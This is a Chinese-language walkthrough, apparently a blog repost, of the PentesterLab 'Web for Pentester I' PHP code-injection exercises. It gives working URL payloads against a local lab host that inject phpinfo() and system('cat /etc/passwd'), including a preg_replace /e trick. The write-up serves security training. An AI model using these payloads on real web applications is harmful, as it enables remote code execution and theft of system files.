Web for PentesterI 代码注入-实战篇

本文主要是根据官网和网上的教程进行实战,详细讲解请参照
1、https://pentesterlab.com/exercises/web_for_pentester/course
2、http://www.freebuf.com/sectool/168653.html
关于代码注入的相关知识:代码注入的原理,检测,利用,下次在补充。
一、example1
1、判断是否存在注入,在url后输入双引号:”
Web for PentesterI 代码注入-实战篇_第1张图片
报错,说明”破坏了内部结构。
后台代码:
Web for PentesterI 代码注入-实战篇_第2张图片
2、payload:http://192.168.152.131/codeexec/example1.php?name=hacker%22.phpinfo();//
还可以将phpinfo 换成system(‘ls’)/system(‘cat /etc/passwd’)
Web for PentesterI 代码注入-实战篇_第3张图片
二、example2
1、后台代码
Web for PentesterI 代码注入-实战篇_第4张图片
2、payload:http://192.168.152.131/codeexec/example2.php?order=id);}system(%27cat%20/etc/passwd%27);//
注意:单引号不能省
Web for PentesterI 代码注入-实战篇_第5张图片
Web for PentesterI 代码注入-实战篇_第6张图片
三、example3
1、后台代码:
Web for PentesterI 代码注入-实战篇_第7张图片
2、payload:http://192.168.152.131/codeexec/example3.php?new=phpinfo()&pattern=/lamer/e&base=Hello%20lamer
这里写图片描述
Web for PentesterI 代码注入-实战篇_第8张图片
四、example4
1、后台代码:
Web for PentesterI 代码注入-实战篇_第9张图片
这里写图片描述
2、payload:http://192.168.152.131/codeexec/example4.php?name=hacker%27.phpinfo().%27
Web for PentesterI 代码注入-实战篇_第10张图片

你可能感兴趣的:(web安全)